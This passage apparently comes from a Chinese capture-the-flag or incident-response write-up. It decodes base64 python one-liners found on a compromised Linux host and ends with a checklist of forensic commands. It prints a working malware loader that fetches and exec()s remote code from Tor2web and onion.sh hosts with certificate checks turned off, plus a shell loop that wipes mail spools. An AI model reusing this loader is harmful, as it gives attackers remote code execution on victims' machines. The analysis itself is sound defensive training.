        f >/dev/null 2>&1 &
        if [ -f /var/spool/mail/$usrname ]; then ${sudo} echo 0>/var/spool/mail/$usrname >/dev/null 2>&1; fi
        if [ -f /var/mail/$usrname ]; then ${sudo} echo 0>/var/mail/$usrname >/dev/null 2>&1; fi
        sleep 30
    done &
fi

一共有两段python脚本,都是用于解码执行base64字符串

1
2

第一段
python2 -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IGJhc2U2NAppbXBvcnQgdXJsbGliMgppbXBvcnQgc3NsCkhPU1Q9Imh0dHBzOi8vYW43a21kMndwNHhvN2hwciIKUlBBVEgxPSJzcmMvc2MiCmQxPUhPU1QrIi50b3Iyd2ViLnN1LyIrUlBBVEgxCmQzPUhPU1QrIi5vbmlvbi5zaC8iK1JQQVRIMQpkMj1IT1NUKyIudG9yMndlYi5pby8iK1JQQVRIMQpkZWYgbGQodXJsLCB0KToKICAgIHRyeToKICAgICAgICBjdHggPSBzc2wuY3JlYXRlX2RlZmF1bHRfY29udGV4dCgpCiAgICAgICAgY3R4LmNoZWNrX2hvc3RuYW1lID0gRmFsc2UKICAgICAgICBjdHgudmVyaWZ5X21vZGUgPSBzc2wuQ0VSVF9OT05FCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGN0eD1GYWxzZQogICAgaWYgY3R4OgogICAgICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIyLnVybG9wZW4odXJsLHRpbWVvdXQ9dCxjb250ZXh0PWN0eCkucmVhZCgpKQogICAgZWxzZToKICAgICAgICAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliMi51cmxvcGVuKHVybCx0aW1lb3V0PXQpLnJlYWQoKSkKICAgIHJldHVybiBwYWdlCnRyeToKICAgIHRyeToKICAgICAgICBwYWdlPWxkKGQxLCA0MSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhZ2U9bGQoZDIsIDQxKQogICAgICAgIGV4ZWMocGFnZSkKZXhjZXB0IEV4Y2VwdGlvbjoKICAgIHBhZ2U9bGQoZDMsIDQxKQogICAgZXhlYyhwYWdlKQogICAgcGFzcw==

#coding: utf-8
import base64
import urllib2
import ssl
HOST="https://an7kmd2wp4xo7hpr"
RPATH1="src/sc"
d1=HOST+".tor2web.su/"+RPATH1
d3=HOST+".onion.sh/"+RPATH1
d2=HOST+".tor2web.io/"+RPATH1
def ld(url, t):
    try:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    except Exception:
        ctx=False
    if ctx:
           page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())
    else:
           page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())
    return page
try:
    try:
        page=ld(d1, 41)
        exec(page)
    except Exception:
        page=ld(d2, 41)
        exec(page)
except Exception:
    page=ld(d3, 41)
    exec(page)
    pass

1 2	第二段 python2 -c "import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19UcnVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk=

import time
while 1:
    print("flag{websec_True@888!}")
    time.sleep(1000)

flag已经出来了

拓展

Linux应急响应流程简易版

用户信息文件 /etc/passwd /etc/shadow
存储 Liunx 系统中的用户的密码信息
普通用户历史记录 .bash_history
开机启动项配置文件 /etc/rc.local /etc/rc.d/rc[0~6]
日志默认存放位置 /var/log/
查找进程
进程号定位到路径，找到执行脚本
查看计划任务，锁定、降权、删除，复制
指定攻击策略，规则
查看定时任务
more /etc/cron.daily/* 查看目录下所有文件

常用命令

显示当前系统负载：
top
htop
查看CPU使用情况：
mpstat
查看内存使用情况：
free -h
内存和进程分析
检查系统中是否存在隐藏进程：
ps -ef | grep -v grep | grep -v ps | awk '{print $2}' | sort -n > /tmp/pslist; ls /proc | sort -n > /tmp/proclist; comm -23 /tmp/proclist /tmp/pslist
显示系统中正在使用的共享内存段：
ipcs -m
查找最近修改的文件：
find / -mtime -1
显示当前网络连接和套接字信息：
lsof -i
检查打开的网络连接和监听端口：
netstat -tulnp | grep LISTEN
ss -tulnp | grep LISTEN
显示连接到本地端口的外部IP地址：
netstat -an | grep :<port>
列出当前运行的进程：
ps -aux
查找特定进程：
ps -aux | grep <process_name>
显示进程树：
pstree -p
查看当前登录的用户：
who
查看最近的登录历史：
last
lastlog
查看具有root权限的用户：
cat /etc/sudoers
getent group sudo
检查是否有可疑的crontab任务：
crontab -l
cat /etc/crontab
ls -la /etc/cron.*
查看所有用户的环境变量（可能含有恶意路径或命令）：
env
等等